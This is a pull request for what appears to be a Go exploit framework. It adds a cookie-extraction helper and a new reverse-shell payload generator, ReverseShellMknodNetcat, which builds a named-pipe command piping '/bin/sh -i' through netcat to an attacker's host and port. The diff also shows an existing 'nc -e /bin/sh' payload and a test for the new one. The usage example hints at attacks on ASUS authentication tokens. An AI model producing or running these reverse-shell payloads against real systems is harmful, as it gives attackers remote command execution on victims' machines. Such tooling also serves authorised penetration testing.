### PR TITLE
Added GetSetCookie and New Payload

### DIFF
--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -15,6 +15,13 @@ func ReverseShellNetcatGaping(lhost string, lport int) string {
 	return fmt.Sprintf("nc %s %d -e /bin/sh", lhost, lport)
 }
 
+// Reverse shell using nc when -e isn't an option
+func ReverseShellMknodNetcat(lhost string, lport int) string {
+	node := random.RandLetters(3)
+
+	return fmt.Sprintf("cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;", node, node, lhost, lport, node, node)
+}
+
 func ReverseShellMknodTelnet(lhost string, lport int, colon bool) string {
 	node := random.RandLetters(3)
 

--- a/payload/reverse_test.go
+++ b/payload/reverse_test.go
@@ -25,6 +25,15 @@ func TestReverseShellNetcatGaping(t *testing.T) {
 	t.Log(payload)
 }
 
+func TestReverseShellMknodNetcat(t *testing.T) {
+	payload := ReverseShellMknodNetcat("127.0.0.1", 4444)
+
+	// random element to this one so just look for the required bits
+	if !strings.Contains(payload, "|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >") {
+		t.Fatal(payload)
+	}
+}
+
 func TestReverseShellMknodTelnet(t *testing.T) {
 	payload := ReverseShellMknodTelnet("127.0.0.1", 4444, true)
 

--- a/protocol/httphelper.go
+++ b/protocol/httphelper.go
@@ -323,3 +323,28 @@ func MultipartAddFile(writer *multipart.Writer, name, filename, ctype, value str
 
 	return err == nil
 }
+
+// Provided an HTTP request, find the Set-Cookie headers, and extract
+// the value of the specified cookie. Example:.
+func GetSetCookieValue(resp *http.Response, name string) (string, bool) {
+	cookies, ok := resp.Header["Set-Cookie"]
+	if !ok {
+		output.PrintError("Missing Set-Cookie header")
+
+		return "", false
+	}
+
+	for _, entry := range cookies {
+		if strings.HasPrefix(entry, name+"=") {
+			end := len(entry)
+			index := strings.Index(entry, ";")
+			if index != -1 {
+				end = index
+			}
+
+			return entry[len(name+"="):end], true
+		}
+	}
+
+	return "", false
+}


### PR DESCRIPTION
Added GetSetCookie value to quickly fetch new set cookie items and a mknod/nc reverse shell option. Usage examples:

```go
cookie, ok := protocol.GetSetCookieValue(resp, "asus_s_token")
if !ok {
    output.PrintError("Failed to authenticate")
    
    return "", false
}
```

and

```go
generated = payload.ReverseShellMknodNetcat(conf.Lhost, conf.Lport)
```